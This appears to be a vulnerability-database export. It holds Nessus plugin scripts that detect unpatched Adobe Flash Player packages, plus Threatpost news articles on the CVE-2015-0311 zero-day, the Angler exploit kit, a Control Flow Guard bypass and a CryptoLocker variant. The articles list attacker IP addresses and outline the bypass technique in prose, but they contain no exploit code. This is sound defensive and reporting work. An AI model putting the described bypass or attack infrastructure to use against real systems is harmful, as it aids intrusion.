\"16.0.0.296 / 13.0.0.264\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 16.0.0.296 (Chrome PepperFlash)';\n else\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:05:13", "description": "An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-02, and APSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0310, CVE-2015-0311,\nCVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.440.", "edition": 28, "published": "2015-01-28T00:00:00", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2015:0094)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0311", "CVE-2015-0312", "CVE-2015-0310"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:5", "p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:6.6", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-0094.NASL", "href": "https://www.tenable.com/plugins/nessus/81036", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0094. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81036);\n script_version(\"1.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0310\", \"CVE-2015-0311\", \"CVE-2015-0312\");\n script_bugtraq_id(72283);\n script_xref(name:\"RHSA\", value:\"2015:0094\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2015:0094)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB15-02, and APSB15-03, listed in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain\nSWF content. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2015-0310, CVE-2015-0311,\nCVE-2015-0312)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.440.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-02.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-03.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0094\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0312\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0310\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0094\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.440-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.440-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T11:12:28", "description": "Adobe Flash Player was updated to 11.2.202.440 (bsc#914463) :\n\n - APSA15-01, CVE-2015-0311\n\n - Update of flashplayer (executable binary) for i386 is\n not available. This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333) :\n\n - APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057) :\n\n - APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303,\n CVE-2015-0304, CVE-2015-0305, CVE-2015-0306,\n CVE-2015-0307, CVE-2015-0308, CVE-2015-0309.\n\n - Disable flash player on machines without SSE2\n (bnc#856386).\n\n - Remove outdated README and keep only up-to-date\n readme.txt.", "edition": 17, "published": "2015-01-30T00:00:00", "title": "openSUSE Security Update : flash-player (openSUSE-SU-2015:0174-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0303", "CVE-2015-0305", "CVE-2015-0304", "CVE-2015-0308", "CVE-2015-0301", "CVE-2015-0309", "CVE-2015-0302", "CVE-2015-0311", "CVE-2015-0307", "CVE-2015-0306", "CVE-2015-0310"], "modified": "2015-01-30T00:00:00", "cpe": ["cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:flash-player-kde4", "p-cpe:/a:novell:opensuse:flash-player-gnome", "p-cpe:/a:novell:opensuse:flash-player"], "id": "OPENSUSE-2015-81.NASL", "href": "https://www.tenable.com/plugins/nessus/81098", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-81.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81098);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/04\");\n\n script_cve_id(\"CVE-2015-0301\", \"CVE-2015-0302\", \"CVE-2015-0303\", \"CVE-2015-0304\", \"CVE-2015-0305\", \"CVE-2015-0306\", \"CVE-2015-0307\", \"CVE-2015-0308\", \"CVE-2015-0309\", \"CVE-2015-0310\", \"CVE-2015-0311\");\n\n script_name(english:\"openSUSE Security Update : flash-player (openSUSE-SU-2015:0174-1)\");\n script_summary(english:\"Check for the openSUSE-2015-81 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Adobe Flash Player was updated to 11.2.202.440 (bsc#914463) :\n\n - APSA15-01, CVE-2015-0311\n\n - Update of flashplayer (executable binary) for i386 is\n not available. This binary was disabled.\n\n - Security update to 11.2.202.438 (bsc#914333) :\n\n - APSB15-02, CVE-2015-0310\n\n - Security update to 11.2.202.429 (bsc#913057) :\n\n - APSB15-01, CVE-2015-0301, CVE-2015-0302, CVE-2015-0303,\n CVE-2015-0304, CVE-2015-0305, CVE-2015-0306,\n CVE-2015-0307, CVE-2015-0308, CVE-2015-0309.\n\n - Disable flash player on machines without SSE2\n (bnc#856386).\n\n - Remove outdated README and keep only up-to-date\n readme.txt.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=856386\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=913057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914333\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=914463\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2015-01/msg00086.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-player packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:flash-player-kde4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-11.2.202.440-2.115.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-gnome-11.2.202.440-2.115.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"flash-player-kde4-11.2.202.440-2.115.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player / flash-player-gnome / flash-player-kde4\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:30", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Adobe on Saturday began patching a zero-day vulnerability in Flash Player, exploits for which have been included in the notorious Angler Exploit Kit. This is the second of two previously unreported critical flaws in the software that have been patched in the last five days.\n\nAdobe last Thursday sent out an [emergency patch for another zero-day under attack](<http://threatpost.com/adobe-patches-one-zero-day-in-flash-still-investigating-separate-vulnerability/110586>) for a vulnerability that could be used to defeat memory protections on Windows machines.\n\nThe second vulnerability, CVE-2015-0311, was reported by French researcher Kafeine, known for his work studying exploit kits and malware used in cybercrime and targeted attacks. The flaw affects Adobe Flash versions 16.0.0.287 and earlier on Windows and Mac OS X machines. Adobe said it is aware of active exploits via drive-buy download attacks against Windows 8.1 and earlier machines running IE or Firefox.\n\n\u201cSuccessful exploitation could cause a crash and potentially allow an attacker to take control of the affected system,\u201d Adobe said in an [advisory](<http://helpx.adobe.com/security/products/flash-player/apsa15-01.html>).\n\nOn Saturday, Adobe released the patch for users who have enabled auto-update for Flash Player desktop runtime. Those users began getting the fix via version 16.0.0.296.\n\n\u201cAdobe expects to have an update available for manual download during the week of January 26, and we are working with our distribution partners to make the update available in Google Chrome and Internet Explorer 10 and 11,\u201d Adobe said.\n\nAs of this morning, a manual download is still not available from Adobe.\n\n\u201cAs a matter of fact, Adobe still lists 16.0.0.287 as the most recent version,\u201d said Johannes Ullrich of the SANS Internet Storm Center. \u201cYou can download 16.0.0.296 if you manually check for updates using Flash.\u201d\n\nThe inclusion of CVE-2015-0311 in the Angler Exploit Kit is worrisome because that could increases the odds vulnerable machines would be attacked before the availability of a patch. Kafeine said only some instances of the exploit kit, however, contain the exploit.\n\nLast Thursday, Kafeine said on Twitter that the group behind Angler had changed the code to exploit Firefox as well as fully patched IE 11 on Windows 8.1. The Flash zero-day exploit is being used to install a version of the Bedep malware, which is used in ad fraud campaigns.\n\n> One last bad news : Windows 8.1 Internet Explorer 11 fully updated is now owned as well. [pic.twitter.com/TgIMVoXliU](<http://t.co/TgIMVoXliU>)\n> \n> \u2014 Kafeine (@kafeine) [January 22, 2015](<https://twitter.com/kafeine/status/558272193797566464>)\n\nResearchers at Cisco, meanwhile, said that security engineers should expect this trend of Flash zero days finding their way into exploit to continue.\n\n\u201cThe group is incorporating these exploits into the Angler EK before the bugs are publicized,\u201d researchers Nick Biasini, Earl Carter and Jaeson Schultz wrote in a [report](<http://blogs.cisco.com/security/talos/angler-flash-0-day>) published on Friday. \u201cConsidering these 0-day exploits are being used alongside one of Angler\u2019s preferred methods of distribution, malvertising, thus intensifying the potential for large-scale compromise.\u201d\n\nCisco said its data shows the Angler exploit for Flash is targeting only IE and Firefox, and that Chrome is being served only other exploits. The researchers report a spike in Angler attacks starting Jan. 20.\n\n> Adobe released the patch for users who have enabled auto-update for Flash Player desktop runtime.\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fadobe-begins-auto-update-patching-of-second-flash-player-zero-day%2F110640%2F&text=Adobe+released+the+patch+for+users+who+have+enabled+auto-update+for+Flash+Player+desktop+runtime.+>)\n\n\u201cAlthough this spike showed an increase in Angler related attacks, these attacks represent a small minority of the overall attack traffic. Based on our telemetry data we have seen domains associated with a single registrar being primarily responsible for the exploits being delivered,\u201d the Cisco report said. \u201cThe approach appears to be rapid domain registration and exploitation with quick rotation of domains. Despite the rapid use of domains the IP\u2019s associated with the attacks have been limited to two primary addresses (46[.]105.251.7 & 94[.]23.247.180).\u201d\n\nThe domains, Cisco said, are used only for 24 hours and that the attackers continue to register new domains daily.\n", "modified": "2015-01-28T21:51:16", "published": "2015-01-26T11:17:58", "id": "THREATPOST:35208BBC851328DC905D9D0B81BCDC6B", "href": "https://threatpost.com/adobe-begins-auto-update-patching-of-second-flash-player-zero-day/110640/", "type": "threatpost", "title": "Adobe Auto-Update Flash Player Zero Day Patch", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:14", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "Introduced in Windows 8.1 Update 3 and Windows 10, Control Flow Guard was Microsoft\u2019s latest antidote to memory-corruption attacks. The technology was meant to stand up to attacks that had long ago figured out how to bypass previous-generation protections such as Address Space Layout Randomization (ASLR) and Data Execution Protection (DEP).\n\nHowever, as every new security wall is put up, researchers and hackers alike try to find ways over, under or through it.\n\nControl Flow Guard is no exception.\n\nOn Friday, at DerbyCon in Louisville, Ky., researcher Jared DeMott of Bromium is expected to deliver a talk on a CFG bypass. DeMott told Threatpost that Bromium disclosed the technique to Microsoft before Black Hat, but the company has decided not to fix it and that it was [not worthy of a bounty](<https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/>).\n\nMicrosoft declined to comment; DeMott said Microsoft told Bromium the bypass doesn\u2019t affect all systems and that it would be a difficult attack vector to exploit.\n\n\u201cThey said it really only affects 32-bit apps running on 64-bit machines, and that it doesn\u2019t affect all systems,\u201d DeMott said. \u201cMy response to them was that IE runs as 32-bit by default on 64-bit Windows and this still fully affects the browser.\u201d\n\nDeMott said that his bypass takes advantage of Microsoft\u2019s choice not to deploy [Control Flow Integrity](<https://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876/>) over Control Flow Guard.\n\n\u201cWhen Control Flow Integrity is implemented, it adds extra checks before a function pointer call is made and a return address is returned, making those the only valid places to return to,\u201d DeMott said. \u201cMicrosoft didn\u2019t feel it was necessary to fully implement Control Flow Integrity; Control Flow Guard protects function pointers only, not return addresses.\u201d\n\nControl Flow Guard, which is a Visual Studio technology, was also built into Microsoft\u2019s new Edge Browser, which made its debut earlier this summer. A previous [bypass of CFG ](<https://blog.coresecurity.com/2015/03/25/exploiting-cve-2015-0311-part-ii-bypassing-control-flow-guard-on-windows-8-1-update-3/>)was disclosed in March by researchers at Core Security.\n\n\u201c[CFG] compiles checks around code that does indirect jumps based on a pointer, restricting these jumps to only jump to function entry points that have had their address taken,\u201d Microsoft describe upon in a [report](<http://blogs.windows.com/msedgedev/2015/05/11/microsoft-edge-building-a-safer-browser/>) explaining the [security features of the Edge browser](<https://threatpost.com/microsoft-edge-browser-seen-as-a-big-security-upgrade/112738/>). \u201cThis makes attacker take-over of a program much more difficult by severely constraining where a memory corruption attack can jump to.\u201d\n\nThe key to DeMott\u2019s bypass, he said, is the ability to corrupt a return address and kick off a series of events leading to a return-oriented programming (ROP) chain that is central to so many memory-corruption attacks. The Bromium technique is called Stack Desync and relies on the use of different function calling conventions, he said.\n\n\u201cIf you mix and match them, when you call a function pointer and the system expects a standard convention, but gets another, the stack desyncs and returns an arbitrary address,\u201d DeMott said. \u201cIf you don\u2019t protect the return addresses, the model is broken.\n\n\u201cIf you don\u2019t protect the return address, you\u2019re leaving exposed the ability for something like what we\u2019re doing. It\u2019s possible to shuffle things around on the stack so that a call will return, not to a valid address, but to the start of an attack instead.\u201d\n\nSuch a bypass is not trivial to pull off and is likely the playground of a nation-state of intelligence-agency backed operation. The attack provides a point of entry onto a network, opening the door to secondary attacks leading to data loss or privilege escalation.\n\n\u201cThis is the next evolution of the typical cat-and-mouse game that is memory corruption,\u201d DeMott said. \u201cAll this research, even though it sounds bad, it\u2019s pushing ball forward and raises bar for attackers. [Microsoft] chose not to fix it and felt like they did the best they could with it and not fully repair it. There\u2019s some slight risk here and the technique we used doesn\u2019t exist everywhere.\u201d\n", "modified": "2015-09-28T19:05:16", "published": "2015-09-22T15:00:11", "id": "THREATPOST:15B31341E263EF985C14F77A30F1799F", "href": "https://threatpost.com/bypass-developed-for-microsoft-memory-protection-control-flow-guard/114768/", "type": "threatpost", "title": "Control Flow Guard Mitigation Bypass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:25", "bulletinFamily": "info", "cvelist": ["CVE-2015-0311"], "description": "When the Blackhole exploit kit went away after the arrest of its alleged creator and maintainer Paunch, there were questions about [which kit would rise up as its successor](<http://threatpost.com/viable-blackhole-successor-could-take-years-to-emerge/103492>).\n\nIt seems that the Angler exploit kit has ascended to the throne.\n\nThe most definitive evidence seems to be the constant updating of the kit with a bevy of zero-day exploits for Adobe Flash Player. Researchers at Cisco\u2019s Talos group today published a [report](<http://blogs.cisco.com/talos/angler-variants>) on the most recent Angler Flash zero day ([CVE-2015-0311](<https://helpx.adobe.com/security/products/flash-player/apsa15-01.html>)) discovered in the kit by French researcher Kafeine.\n\nCisco\u2019s Nick Biasini said 1,800 domains have been compromised by this exploit, and have been used by five IP addresses: 85.25.107.126, 207.182.149.14, 178.32.131.248, 178.32.131.185, and 85.25.107.127.\n\n\u201cThese domains are associated with the landing page and exploits,\u201d Biasini said. \u201cNone of the actual root domains appear to be compromised and are legitimately registered to owners.\u201d\n\nThe latest Angler/Flash campaign hit its peak Jan. 28 and 29 with almost 1,400 infections over that 48-hour period before tapering off two days later.\n\n\u201cThere are enough of these domains that some of them are only seen once before being abandoned. The majority of the compromised domains are registered through GoDaddy and it appears that 50+ accounts have been compromised,\u201d he said. \u201cMany of these accounts control multiple domains with some controlling 45+ unique domains.\u201d\n\nCisco published a small sample of sub-domains involved in these attacks that were registered to one domain, all of them resolving to one IP address, Biasini said. Another set of subdomains, he said, act as the initial redirection page. The attackers are using malicious online advertisements to serve the exploits, with those pointing to compromised subdomains. Those sites redirect to another subdomain that serves up a landing page and either Flash or Microsoft Silverlight exploits, also included in the Angler kit.\n\nMost of the hashes have low detection rates, Cisco said.\n\n> The latest Angler/Flash campaign hit its peak Jan. 28 and 29 with almost 1,400 infections over that 48-hour period. via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2F1800-domains-overtaken-by-flash-zero-day%2F110835%2F&text=The+latest+Angler%2FFlash+campaign+hit+its+peak+Jan.+28+and+29+with+almost+1%2C400+infections+over+that+48-hour+period.+via+%40Threatpost>)\n\n\u201cThis is another example of how Angler Exploit Kit continues to differentiate itself. It changes and evolves on a constant basis producing new variation on the existing exploits as well as providing enough customization on the recent vulnerability (CVE-2015-0311) to effectively avoid reliable detection,\u201d Biasini said. \u201cIf the first month of 2015 is any indication, the Angler Exploit Kit could have a big year.\u201d\n\nKafeine spotted the Flash zero day exploit code in Angler on Jan. 20, and it was [installing click-fraud malware known as Bedep](<http://threatpost.com/exploit-for-flash-zero-day-appears-in-angler-exploit-kit/110569>), also installed by older versions of Angler. Further analysis by researchers at Websense revealed that the zero-day exploit could inject malicious payloads into users\u2019 browsers. The exploit code was hidden among [several layers of obfuscation](<http://threatpost.com/analysis-of-flash-zero-day-shows-layers-of-obfuscation/110674>) in order to keep it from being detected.\n\nAdobe released a patch for customers who had enabled auto-update for Flash on the desktop on Jan. 24 before releasing an out-of-band patch two days later. On Monday, another unrelated [Flash zero day](<http://threatpost.com/another-flash-zero-day-emerges/110786>), the third in two weeks was patched in another emergency update.\n", "modified": "2015-02-05T19:15:23", "published": "2015-02-03T14:27:13", "id": "THREATPOST:9009527D58E12C6B44AB69AD73844FDA", "href": "https://threatpost.com/1800-domains-overtaken-by-flash-zero-day/110835/", "type": "threatpost", "title": "1,800 Domains Overtaken by Flash Zero Day", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:13", "bulletinFamily": "info", "cvelist": ["CVE-2013-2551", "CVE-2015-0311"], "description": "Gamers may soon be feeling the pain of crypto-ransomware.\n\nA variant of CryptoLocker is in the wild that goes after data files associated with 20 different online games, locking downloadable content in an attempt to target younger computer users.\n\nResearchers at Bromium today said an unnamed compromised website is serving the malware. Victims are redirected by a Flash exploit to a site hosting the Angler exploit kit, and Angler drops the CryptoLocker variant.\n\n\u201cThe website is based on WordPress and could have been compromised by any one of the numerous WP exploits,\u201d wrote Vadim Kotov in an [advisory](<http://labs.bromium.com/2015/03/12/achievement-locked-new-crypto-ransomware-pwns-video-gamers/>) for Bromium. \u201cAdditionally, the URL where the malicious Flash file is hosted keeps changing.\u201d\n\nKotov said the attackers forgo typical iframe redirects and instead use a Flash file wrapped in an invisible div tag, likely in an attempt to evade detection. The malware proceeds through a number of checks for the presence of virtual machines or antivirus before dropping a Flash exploit for CVE-2015-0311 or an Internet Explorer exploit CVE-2013-2551.\n\nThe malware behaves like a typical CryptoLocker infection, presenting the victim with a banner explaining that files have been encrypted, and a ransom must be paid with Bitcoin in order for a decryption key to be sent to the victim. There are also instructions to make payments over Tor if the decryption site is not working.\n\nMore than 50 file 